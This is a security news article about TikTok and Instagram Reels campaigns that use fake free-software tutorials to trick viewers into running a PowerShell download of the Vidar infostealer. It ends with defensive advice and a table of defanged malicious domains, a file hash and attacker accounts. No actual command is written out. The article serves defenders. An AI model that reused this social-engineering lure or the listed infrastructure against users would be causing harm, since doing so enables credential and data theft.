Hackers Use TikTok and Instagram Reels to Spread Vidar Malware Through Fake Free Software Tutorials

Hackers are using TikTok and Instagram Reels videos to push malware through fake tutorials that promise free access to paid software, including Spotify Premium and other popular tools.

The campaigns were detailed by ReversingLabs, which found two social media tactics designed to move users from short videos to malicious downloads or unsafe third-party websites.

The confirmed malware in one campaign is Vidarstealer, also known as Vidar. It is an information-stealing malware family that can collect passwords, financial details, authentication tokens, and other sensitive data from infected Windows devices.

Fake Windows-style accounts push malicious PowerShell commands

The first campaign uses accounts that look like Windows support or technology tip pages. Some profiles used names such as windows.tips and windows.insights, along with blue and white profile images that resemble Microsoft-style branding.

The videos appear polished, with clean graphics and voiceovers that walk viewers through steps to unlock premium software for free. In one example covered by Help Net Security, viewers were told to open PowerShell and run a command that supposedly unlocked Spotify Premium.

That command did not provide a legitimate subscription. It downloaded a file identified as Vidarstealer from a remote domain, turning a short social media tutorial into a malware installation path.

Campaign detail	What researchers found
Platforms used	TikTok and Instagram Reels
Main lure	Free Spotify Premium and other paid software
Confirmed malware	Vidarstealer
Common tactic	Fake tutorials that tell users to run commands or visit download sites
Confirmed delivery path	PowerShell command using a remote download address
Audience signal	Some videos reached more than 100,000 views

Attackers use engagement to make scams look trustworthy

These videos can look more credible because they collect views, saves, likes, comments, and shares. For many users, that visible engagement works like a trust signal, even when the content comes from an unknown account.

Malwarebytes noted that short-form video platforms have become a new way for cybercriminals to spread infostealers, with videos telling users to run dangerous commands or visit malicious download pages.

ReversingLabs found one lure video with more than 109,000 views, 1,699 saves, 1,581 likes, and 974 shares. Saves and shares matter because they can help a post reach more people through recommendation systems.

• Fake accounts copy the look of trusted technology pages.
• Videos use voiceovers and simple instructions to appear helpful.
• Attackers promise free access to paid software.
• PowerShell commands hide the real download activity from non-technical users.
• High engagement makes malicious content look more credible.

A second campaign builds curiosity before sending users to download sites

The second campaign uses a more casual style. Instead of giving instructions immediately, attackers post short videos showing premium features in apps such as Spotify, then encourage viewers to comment or ask how the user got access.

After viewers engage, the account may reply with instructions, send a direct message, point users to another tutorial, or send them to a link in the profile. Some of those sites claimed to offer free premium games, AI tools, Spotify Premium, CapCut Pro, and YouTube Premium.

Researchers saw domains such as pluginchad[.]xyz, maxapk[.]xyz, and d4ug[.]site tied to the campaign. Some sites were already offline during analysis, while survey-gated pages prevented researchers from confirming every final payload.

Method	How it works	Main risk
Fake tutorial video	User follows a step-by-step command shown in a short video	Direct malware download and execution
Comment bait	User comments to ask how premium features were unlocked	Attacker replies with unsafe instructions or links
Profile link funnel	Account sends users to a download site outside the platform	Fake installers, surveys, redirects, or malware

Vidar remains a popular infostealer for low-cost cybercrime

Vidar has been active for years and is commonly sold as malware-as-a-service. It can steal browser data, credentials, cookies, tokens, cryptocurrency wallet data, and other files that help attackers hijack accounts or commit fraud.

According to Trend Micro, earlier TikTok campaigns used videos to lure users into running PowerShell commands that delivered Vidar and StealC infostealers. That earlier research shows that social video malware delivery has been developing for some time, not appearing as a one-off tactic.

The new campaign follows the same broader pattern. Attackers go where users already spend time, then turn everyday tutorial behavior into a malware delivery method.

Why TikTok and Instagram scams are hard to stop

Social media scams are difficult to remove quickly because the harmful instruction may appear inside the video rather than in a file that security tools can scan. A platform may see a short tutorial, while the user sees a command they later run on their own device.

The Help Net Security report also noted that users who warn others in comments can be blocked, while attackers can delete warning comments from their own posts.

ReversingLabs said attempts to report some Instagram posts as scams were rejected. Even when a malicious account disappears, attackers can create new accounts and repost similar videos with little effort.

What users and companies should do

Users should never run PowerShell, Command Prompt, Windows Run, or terminal commands copied from a social media video. Legitimate software vendors do not ask users to unlock paid features by pasting scripts from short videos.

Malwarebytes recommends downloading software only from official vendor websites, avoiding cracked or unofficial versions of paid apps, and verifying files before running them.

Organizations should also update employee training. Social media now belongs in phishing awareness programs, especially for workers who use personal devices near work accounts or install software on company-managed systems.

• Block known malicious domains and hashes from this campaign.
• Limit who can install software on work devices.
• Monitor for suspicious PowerShell commands launched after browser activity.
• Warn users not to run commands from TikTok, Instagram, YouTube Shorts, or similar videos.
• Review endpoint alerts for unexpected downloads named build.exe.
• Train employees to report suspicious social media instructions, not just suspicious emails.

Indicators of compromise

Security teams can use the following indicators as a starting point for threat hunting. Some domains may already be offline, but related infrastructure and copied campaign templates can continue to appear.

Type	Indicator	Description
SHA-256	03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153	Hash of build.exe, identified as Vidarstealer
Domain	pluginchad[.]xyz	Fake free software download site
Domain	maxapk[.]xyz	Fake free software download site
Domain	d4ug[.]site	Site claiming to unlock premium games and AI tools
Domain	slmgr[.]sh	Domain connected to malicious command delivery
Domain	msget[.]run	Domain used in the malicious PowerShell delivery path
Account	tiktok[.]com/@windows.tips1	Malicious TikTok account tied to the tutorial campaign
Account	tiktok[.]com/@windows.insight	Malicious TikTok account tied to the tutorial campaign
Account	tiktok[.]com/@davidcooksey47	Account associated with the campaign
Account	tiktok[.]com/@tracyhughe	Account associated with the campaign
Account	tiktok[.]com/@mr.capcut.pro2	Account associated with the campaign
Account	instagram[.]com/wtips404	Instagram account tied to the campaign
Account	instagram[.]com/wndwstips	Instagram account tied to the campaign
Account	instagram[.]com/epemberton369	Instagram account tied to the campaign

Short videos have become a malware delivery channel

The rise of these campaigns shows that phishing no longer belongs only to email, text messages, or fake login pages. A short video can now deliver the social engineering, the instructions, and the credibility signal in under a minute.

ReversingLabs researchers said attackers can delete warning comments, block users who call out the scam, and keep reposting content across accounts and platforms.

The broader trend also matches Trend Micro’s TikTok infostealer research, which warned that social video platforms give attackers algorithmic reach without needing to host malicious code directly on the platform.

For users, the rule is simple: free premium software tutorials that require copied commands, unofficial installers, or survey-gated downloads should be treated as suspicious. For companies, the response should combine technical controls, endpoint monitoring, and training that covers social media as a real attack surface.

FAQ